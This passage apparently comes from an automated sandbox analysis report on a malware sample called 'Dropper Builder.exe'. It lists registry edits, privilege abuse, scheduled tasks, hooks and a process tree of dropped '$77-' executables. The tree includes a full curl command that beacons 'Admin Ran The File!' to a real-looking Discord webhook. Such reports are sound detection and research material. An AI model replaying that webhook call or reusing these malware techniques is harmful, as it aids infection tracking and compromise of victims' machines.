| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{289AF617-1CC3-42A6-926C-E6A863F0E3BA} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000e964355368c4da01 | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{99D353BC-C813-41EC-8F28-EAE61E702E57} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 0100000000000000624f415068c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2BF9676-5F8F-435C-97EB-11607A5BEDF7} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 0100000000000000fdd84a5068c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000693b4d5068c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{470C0EBD-5D73-4D58-9CED-E91E22E23282} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000fdd84a5068c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000624f415068c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{596AB062-B4D2-4215-9F74-E9109B0A8153} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000a801335068c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ndfapi.dll,-40001 = "Windows Network Diagnostics" | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2BF9676-5F8F-435C-97EB-11607A5BEDF7} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000fdd84a5068c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000fdd84a5068c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | C:\Windows\System32\dllhost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe
"C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Windows\SysWOW64\curl.exe
curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
C:\Users\Admin\AppData\Local\Temp\$77-install.exe
"C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
